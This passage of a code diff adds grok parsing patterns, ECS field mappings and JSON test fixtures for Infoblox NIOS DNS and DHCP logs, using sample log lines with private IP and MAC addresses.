%{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_3: "validating %{DATA:dns_question_name}/%{WORD:dns_question_type}: %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_4: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} updating zone '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_5: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_6: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios_log_dns_before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios_log_dns_after_query}', type %{DATA:dns_question_type}" + DNS_7: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} %{DATA:infoblox_nios_log_dns_header_flags} \\(%{IP:server_ip}\\)" + DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}" + DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_10: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:dns_records}" + DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_14: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}" + + # Original pattern + DNS_0: '(%{WORD:infoblox_nios_log_dns_category}: )?client ?(%{DATA}) %{IP:client_ip}#%{INT:client_port} (%{DATA}): query: %{DATA:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + + # Other patterns + + ## For DNS message like: + ## FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53 + DNS_FORMERR: "%{WORD:event_action} resolving '%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:destination_ip}#%{NUMBER:destination_port}" + + ## For other message like: + ## r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$ + DNS_OTHER: "r-l-e:%{IP:client_ip},%{DATA:infoblox_nios_log_dns_category},%{DATA:infoblox_nios_log_dns_client_hostname},%{MAC:client_mac},%{NUMBER:infoblox_nios_log_dns_lease_start},%{NUMBER:infoblox_nios_log_dns_lease_end},%{GREEDYDATA:infoblox_nios_log_dns_message}" + + - name: parse_event + filter: "{{'REQUEST DHCP' in original.message or 'DHCPREQUEST' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCP_1}|%{DHCP_2}|%{DHCP_3}|%{DHCP_4}|%{DHCP_5}|%{DHCP_6}|%{DHCP_7}|%{DHCP_8}|%{DHCP_9}|%{DHCP_10}|%{DHCP_11}|%{DHCP_12}|%{DHCP_OTHER}" + custom_patterns: + DHCP_1: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_2: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_3: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_4: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}' + DHCP_5: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_6: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_7: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_8: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}" + DHCP_9: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}' + DHCP_10: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCP_11: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}" + DHCP_12: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name})" + + # Other patterns + + ## For DHCP message like: + ## Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", a remote-id of "0a:44:70:46" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW) + DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) %{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}' + + - name: parse_event + filter: "{{'DHCPACK' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCPACK_1}|%{DHCPACK_2}|%{DHCPACK_3}|%{DHCPACK_4}|%{DHCPACK_5}|%{DHCPACK_6}|%{DHCPACK_7}|%{DHCPACK_8}|%{DHCPACK_9}|%{DHCPACK_10}|%{DHCPACK_11}|%{DHCPACK_12}" + custom_patterns: + # Patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dhcp.yml + DHCPACK_1: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_2: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_3: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_4: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\)" + DHCPACK_5: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_6: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_7: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_8: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_9: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_10: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_11: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_12: "%{WORD:event_action} to %{IP:client_ip} \\(%{MAC:client_mac}\\) via %{WORD:observer_ingress_interface_name}" + + - name: parse_datetime + external: + name: date.parse + properties: + input_field: "{{parse_event.message._tmp_timestamp}}" + output_field: result + format: "%d-%b-%Y %H:%M:%S.%f" + - name: set_ecs_fields stages: set_ecs_fields: actions: - set: - source.ip: "{{parse_event.message.src}}" - filter: "{{parse_event.message.src | is_ipaddress}}" + source.ip: "{{parse_event.message.client_ip}}" + filter: "{{parse_event.message.client_ip | is_ipaddress}}" - set: - source.port: "{{parse_event.message.spt}}" + "@timestamp": "{{parse_datetime.result}}" + event.action: "{{parse_event.message.event_action}}" + event.reason: "{{parse_event.message.infoblox_nios_log_dhcp_request_message or parse_event.message.infoblox_nios_log_dhcp_lease_message}}" + + source.port: "{{parse_event.message.client_port}}" + source.mac: "{{parse_event.message.client_mac}}" + + destination.ip: "{{parse_event.message.destination_ip}}" + destination.port: "{{parse_event.message.destination_port}}" + + observer.ingress.interface.name: "{{parse_event.message.observer_ingress_interface_name}}" + + infoblox.dhcp.interface_ip: "{{parse_event.message.infoblox_nios_log_dhcp_interface_ip}}" + infoblox.dhcp.trans_id: "{{parse_event.message.infoblox_nios_log_dhcp_trans_id}}" + infoblox.dhcp.router_ip: "{{parse_event.message.infoblox_nios_log_dhcp_router_ip}}" + infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}" + infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}" + dns.question.class: "{{parse_event.message.dns_question_class}}" dns.question.type: "{{parse_event.message.dns_question_type}}" dns.question.name: "{{parse_event.message.dns_question_name}}" - dns.type: "query" + dns.response_code: "{{parse_event.message.dns_response_code}}" + dns.header_flags: > [ {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %} {% if parse_event.message.flags_cd == "C" %}"CD",{% endif %} ] + + - set: + dns.type: query + filter: '{{parse_event.message.get("response_code") == None}}' + - set: + dns.type: answer + dns.response_code: "{{parse_event.message.response_code}}" + filter: '{{parse_event.message.get("response_code") != None}}' + + - set: + dns.answers: | + [ + {%- for data in parse_event.message.dns_records.split(';') -%} + {%- if data != "" -%} + {%- set record = data.split(' ') -%} + {"name": "{{record[-5]}}", "ttl": {{record[-4]}}, "class": "{{record[-3]}}", "type": "{{record[-2]}}", "data": "{{record[-1]}}"}, + {%- endif -%} + {%- endfor -%} + ] + filter: "{{parse_event.message.get('dns_records') != None}}" + + - set: + network.transport: tcp + filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp == "T"}}' + - set: + network.transport: udp + filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp != "T"}}' - set: - network.transport: "tcp" - filter: '{{parse_event.message.flags_tcp == "T"}}' + network.transport: "{{parse_event.message.network_transport | lower }}" + filter: '{{parse_event.message.get("network_transport") != None}}' - set: - infoblox.ddi.category: "{{parse_event.message.category}}" + infoblox.ddi.category: "{{parse_event.message.infoblox_nios_log_dns_category}}" diff --git a/Infoblox/ddi/tests/query_log_dhcp_1.json b/Infoblox/ddi/tests/query_log_dhcp_1.json new file mode 100644 index 000000000..0e2ff27e2 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_1.json @@ -0,0 +1,31 @@ +{ + "input": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)" + }, + "expected": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", + "event": { + "action": "REQUEST DHCP", + "reason": "lease time is undefined seconds. (NEW)" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0" + } + }, + "related": { + "ip": [ + "192.168.1.222" + ] + }, + "source": { + "address": "192.168.1.222", + "ip": "192.168.1.222", + "mac": "00:50:56:ae:b3:44" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_2.json b/Infoblox/ddi/tests/query_log_dhcp_2.json new file mode 100644 index 000000000..44aebdb62 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_2.json @@ -0,0 +1,31 @@ +{ + "input": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)" + }, + "expected": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", + "event": { + "action": "REQUEST DHCP", + "reason": "lease time is undefined seconds. (NEW)" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0" + } + }, + "related": { + "ip": [ + "192.168.1.53" + ] + }, + "source": { + "address": "192.168.1.53", + "ip": "192.168.1.53", + "mac": "00:50:56:ae:b3:44" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_3.json b/Infoblox/ddi/tests/query_log_dhcp_3.json new file mode 100644 index 000000000..bca901b0b --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_3.json @@ -0,0 +1,31 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6" + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6", + "event": { + "action": "DHCPREQUEST" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "interface_ip": "192.168.1.107", + "trans_id": "80b994d6" + } + }, + "related": { + "ip": [ + "192.168.1.107" + ] + }, + "source": { + "address": "192.168.1.107", + "ip": "192.168.1.107", + "mac": "e8:c8:29:5c:c8:99" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_4.json b/Infoblox/ddi/tests/query_log_dhcp_4.json new file mode 100644 index 000000000..826be7f66 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_4.json @@ -0,0 +1,38 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)" + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)", + "event": { + "action": "DHCPREQUEST", + "reason": "RENEW" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "trans_id": "823c1fa3" + } + }, + "observer": { + "ingress": { + "interface": { + "name": "eth2" + } + } + }, + "related": { + "ip": [ + "192.168.1.208" + ] + }, + "source": { + "address": "192.168.1.208", + "ip": "192.168.1.208", + "mac": "00:50:56:ae:17:c6" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_5.json b/Infoblox/ddi/tests/query_log_dhcp_5.json new file mode 100644 index 000000000..681472682 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_5.json @@ -0,0 +1,33 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable." + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable.", + "event": { + "action": "DHCPREQUEST", + "reason": "lease 192.168.1.95 unavailable." + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "interface_ip": "192.168.1.95", + "router_ip": "192.168.1.95", + "trans_id": "ac1b72c4" + } + }, + "related": { + "ip": [ + "192.168.1.95" + ] + }, + "source": { + "address": "192.168.1.95", + "ip": "192.168.1.95", + "mac": "d8:94:03:ec:da:d1" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_6.json b/Infoblox/ddi/tests/query_log_dhcp_6.json new file mode 100644 index 000000000..ad6128a51 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_6.json @@ -0,0 +1,32 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet)." + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet).", + "event": { + "action": "DHCPREQUEST", + "reason": "ignored (unknown subnet)." + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "interface_ip": "192.168.1.159", + "trans_id": "e711c0c1" + } + }, + "related": { + "ip": [ + "192.168.1.159" + ] + }, + "source": { + "address": "192.168.1.159", + "ip": "192.168.1.159", + "mac": "c8:09:a8:f8:cd:e8" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_7.json b/Infoblox/ddi/tests/query_log_dhcp_7.json new file mode 100644 index 000000000..301ee3a35 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_7.json @@ -0,0 +1,32 @@ +{ + "input": { + "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800" + }, + "expected": { + "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800", + "event": { + "action": "DHCPACK" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "observer": { + "ingress": { + "interface": { + "name": "eth2" + } + } + }, + "related": { + "ip": [ + "192.168.1.138" + ] + }, + "source": { + "address": "192.168.1.138", + "ip": "192.168.1.138", + "mac": "08:71:90:8d:0b:5d" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_8.json b/Infoblox/ddi/tests/query_log_dhcp_8.json new file mode 100644 index 000000000..a0415a271 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_8.json @@ -0,0 +1,27 @@ +{ + "input": { + "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$" + }, + "expected": { + "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$", + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "ddi": { + "category": "Fixed" + } + }, + "related": { + "ip": [ + "192.168.1.113" + ] + }, + "source": { + "address": "192.168.1.113", + "ip": "192.168.1.113", + "mac": "c4:d0:e3:b4:08:4d" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_1.json b/Infoblox/ddi/tests/query_log_dns_1.json new file mode 100644 index 000000000..042f12e70 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_1.json @@ -0,0 +1,36 @@ +{ + "input": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53" + }, + "expected": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53", + "event": { + "action": "FORMERR" + }, + "destination": { + "address": "192.168.1.136", + "ip": "192.168.1.136", + "port": 53 + }, + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.testing.io", + "registered_domain": "testing.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "type": "query" + }, + "related": { + "hosts": [ + "test.testing.io" + ], + "ip": [ + "192.168.1.136" + ] + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_2.json b/Infoblox/ddi/tests/query_log_dns_2.json new file mode 100644 index 000000000..1d4135768 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_2.json @@ -0,0 +1,36 @@ +{ + "input": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +" + }, + "expected": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.io", + "registered_domain": "test.io", + "top_level_domain": "io", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 1130 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_3.json b/Infoblox/ddi/tests/query_log_dns_3.json new file mode 100644 index 000000000..959a20d36 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_3.json @@ -0,0 +1,36 @@ +{ + "input": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE" + }, + "expected": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE", + "dns": { + 